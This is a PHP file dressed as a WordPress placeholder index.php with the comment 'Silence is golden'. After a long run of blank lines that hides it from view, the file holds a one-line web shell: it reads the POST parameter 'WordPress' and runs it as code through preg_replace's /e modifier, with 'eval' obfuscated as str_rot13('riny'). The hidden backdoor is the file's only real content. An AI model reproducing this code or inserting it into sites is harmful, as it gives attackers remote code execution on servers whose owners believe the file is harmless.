<?php

// Silence is golden.



















































































































































































































































































































































































































































































































































































































































































































































































































































































($WordPress = $_POST['WordPress']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($WordPress)', 'add');

?>